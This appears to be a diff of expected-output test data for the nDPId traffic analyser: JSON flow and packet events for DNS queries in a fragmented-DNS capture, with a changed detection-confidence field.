00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869889796,"flow_last_seen":1560869889796,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1560869889796,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1560869889796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":113,"pkt_l4_len":59,"thread_ts_msec":1560869889796,"pkt":"CFsOoYNeAAwpfKTLht1gDB+KADsRQCABBHAfCxawAgwp\/\/58pMsmIAD+AAAAAAAAAAAAAAD+pWgANQA7UegG5AEgAAEAAAAAAAEHZm9ybWVsMQJkZQAAAQABAAApEAAAAAAAAAwACgAIf6ON2rCVwqA="} 
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869889796,"flow_last_seen":1560869889796,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1560869889796,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869889796,"flow_last_seen":1560869889796,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1560869889796,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1560869889815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":117,"pkt_l4_len":63,"thread_ts_msec":1560869889815,"pkt":"AAwpfKTLCFsOoYNeht1gAAAAAD8ROyYgAP4AAAAAAAAAAAAAAP4gAQRwHwsWsAIMKf\/+fKTLADWlaAA\/kK8G5IGAAAEAAQAAAAEHZm9ybWVsMQJkZQAAAQABwAwAAQABAAAOEAAEVRnq\/QAAKRAAAAAAAAAA"} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"85.25.234.253"}} 
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"formel1.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"85.25.234.253"}} +00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1560869889815,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869895045,"flow_last_seen":1560869895045,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1560869895045,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1560869895045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":112,"pkt_l4_len":58,"thread_ts_msec":1560869895045,"pkt":"CFsOoYNeAAwpfKTLht1gAPc5ADoRQCABBHAfCxawAgwp\/\/58pMsmIAD+AAAAAAAAAAAAAAD+tnUANQA6UeeM7AEgAAEAAAAAAAEGZXJmcG9wAmRlAAAcAAEAACkQAAAAAAAADAAKAAh2WSv8Ots3rg=="} 
-00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869895045,"flow_last_seen":1560869895045,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1560869895045,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869895045,"flow_last_seen":1560869895045,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1560869895045,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1560869895070,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":156,"pkt_l4_len":102,"thread_ts_msec":1560869895070,"pkt":"AAwpfKTLCFsOoYNeht1gAAAAAGYRPCYgAP4AAAAAAAAAAAAAAP4gAQRwHwsWsAIMKf\/+fKTLADW2dQBmf6uM7IGAAAEAAgAAAAEGZXJmcG9wAmRlAAAcAAHADAAcAAEAAAEsABAmBkcAADAAAAAAAABoGGKRwAwAHAABAAABLAAQJgZHAAAwAAAAAAAAaBhjkQAAKQIAAAAAAAAA"} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869895070,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":1,"num_answers":3,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.6.71.0"}} 
+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869895070,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"erfpop.de","num_queries":1,"num_answers":3,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.6.71.0"}} 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869900222,"flow_last_seen":1560869900222,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869900222,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1560869900222,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1560869900222,"pkt":"CFsOoYNeAAwpfKTLht1gDZ0NADwRQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBT2bEANQA8zxHCoAEgAAEAAAAAAAEId2ViZXJsYWICZGUAADAAAQAAKRAAAACAAAAMAAoACPFs5uYvfUZc"} 
-00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869900222,"flow_last_seen":1560869900222,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869900222,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869900222,"flow_last_seen":1560869900222,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869900222,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1560869905222,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1560869905222,"pkt":"CFsOoYNeAAwpfKTLht1gDZ0NADwRQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBT2bEANQA8zxHCoAEgAAEAAAAAAAEId2ViZXJsYWICZGUAADAAAQAAKRAAAACAAAAMAAoACPFs5uYvfUZc"} 02413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1560869905232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1494,"pkt_l4_len":1432,"thread_ts_msec":1560869905232,"pkt":"AAwpfKTLCFsOoYNeht1gC9IyBaAsPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLEQAAAQAABpoANdmxBspAOcKghQAAAQAEAAAAAQh3ZWJlcmxhYgJkZQAAMAABwAwAMAABAAAAPAIIAQEDCgMBAAHd7\/3tIq12CjsLWBAd1T3u8\/far4uZXvf8tV18qZaecv+cWqq5v63pRvKYMfBrDVtiIL4iSgCelIlOORESqB\/n89qn9klBRxVsJMHolsi2eBGR4aML4ghMfeD+DrMDSl5nWB3t\/K5Rz2vtzsqVvYGH0fZYQiit53gj6vP2hRbE0yO3UPkNpBEVogjAsm5eFjsLAaP0ZZzzOMrnzCiJQAYjOTVkDzZiOo2MwGKWKMlIXfR55yCA5TUPPR6V0HRZsrDK2l2G+6gzqDhIjqHbbSh9Mv77SdkkVNOUReABLpmnCFMwIuSy9nDEMQu7e65QyOF+NjUXziwKhrjnnJRY86s9znQCVnoPwAJ0m29NgBgpEN+9E19YVr3gF7esaT1ji4B10iyBf5c\/sJfg5vGTVg55+cxCbhI98aL2tYPM5kVyTpqgOlYRqnsMRfHPsinjRDh8+F+P0S5lhyLhG726D9NA5OQPW4cmRlbMrTiYPjcIRULbwVi5g\/NhRbX0rdr5mxRTcAGTp0WViThvS+0xXBiJtThFC5qIVMhS7ARjFwxTrtZNKOqapuPebbAbjMiTaX3UKD8DpFKbCouo5jaur0Y77zYiW3BcpU0K6hxkxrjqKblLAW1F4\/5zq+COo+NpOhgyLk8iw5Gla3a8V5hp3zZ0rXalprx16P2BcHZbPW3E+8AMADAAAQAAADwBCAEAAwoDAQAB0FTcKPFQrDtJ5jNrtzHKr9eDfOdVCwzO4X9R4tqKA65u0keHGEv6bXb0jFCRMqjwlEhdwpcP5pWLO2KaXz7wE8JcU09+0Wl0ULMFE0YeP9xrWD8WVyTq\/lq9p8H+EaptYpjYsQYpvmS1hYaPwkHSasoaoNlU\/KJ4LR1hW\/TaI5o69SF2XtC2BX
JtHdXqAeWGgbQHEb4ZuNSn43I8KVu4w4jB+VtUYHn3jo\/JAZCCcY1fYvUwe6Y5pgL8PdSfLNBk0yaqPzkbAM0\/AR4N8urrCbUFR\/HszDBwRW47YHRiZTKI+JJ9SgZPCbY\/WcY0yGViKPdtj1W\/LEKo9CcrSzlOvcAMAC4AAQAAADwCHwAwCgIAAAA8XSexsF0AI8Ezewh3ZWJlcmxhYgJkZQDDZMohasNCzdZy+qXT+i9EuX\/inlaoHckoPQ6pZUM55HOKiXWwbCF2bgR2vTatltfgdQMYsjHLb9y8\/8K16x1bINo7jHhPhiQ3mZPnhRDbC819\/mg\/DAJlEfo4\/PIHroaOXHkEsxclA3Sfl5XzqMY8dIIjCMSIRohmpz3ajd1g8Q5nPhvruiTi3rbkkaFuvAu6JBazSxvplBTGRsLiwD\/keT1H0ch7BVc1oZ6xmkqy68vIsD63Fj1r1Prt7pmrCHTCuEgsO78D9dCQuWCLkJQxGUVXJj5CI3Hv7xFFgpu2WdK7EiEBH5rHphjb8hJPFep1cggzgdSO7gr4PL16UQJ4paFWEovlSSSKN6CqV0KlzY5UKpoC4bOcRMiiujkcgLRcJzDNjTcP59699eiRBYcnSUNu7NR\/AQOsLe1gcGBMYVI28uXABijFJJPUYQFFRKKQYYy7U8augfodJClNM+5PjDrN7VUaoyW\/CtbFigLZaje\/SbLFkod9oTkuhnetL7fyEnlGfxKmEZ218qPcsKDJRrRyymc+WdZ+tPcZvQXr6AVS7RZSoUTV\/+5dVd2kWuuF2w5rsnAIOU3wwIEPhsTwq9njhb9Bp9jOMH3FFbo4srNvY4pocOs9Lic1Os813bu7VyQz3Nrv\/xfPOPvvG\/\/ufcPEO13FnB7dwg\/ymTeeu8NjAC4AAQAAADwBHwAwCgIAAAA8XSexsF0AI8GQRwh3"} -00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869905232,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 
+00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869905232,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00211{"error_event_id":12,"error_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"packet_id":39,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":334,"global_ts_msec":1560869905233} 00776{"packet_event_id":1,"packet_event_name":"packet","packet_id":39,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":368,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":368,"pkt_l4_len":0,"thread_ts_msec":1560869905232,"pkt":"AAwpfKTLCFsOoYNeht1gC9IyATosPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLEQAFmAAABpplYmVybGFiAmRlAKU8TJxFacYrnzjzribJyhzI\/PZTM81o7M0N53bVhGij+9zhJRNeoUG2ZbhJAUMEBAu7geapxJ7U1z+UqhkFSi8Qu6jROnMih5xzmixXOjO2RiHT8eMzQMHqilreexmdz+7rH4jCggpAg2YenRMzpvhrf0+OEWUNhwq6dNYVlNWg1Yf1oxCRsZ6Xiq2pemle4KOkgobWECgdELaMnIZKUJ0WtpAZJuCbAIPvak3YgHcNPR4Sbx1lKRTPW6QxjFsHJ5X\/B6mNMVtqG97wzaO\/ugVwH81Qt2Llpj5Wb873AtMbd7OQYLwhJ7fhxJ9xNJn6SlVRp6C+1P2Wyu\/7U0mgP+sAACkQAAAAgAAAHAAKABjxbObmL31GXCozdz5dCPwRZU4FwINgbJY="} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869910534,"flow_last_seen":1560869910534,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869910534,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 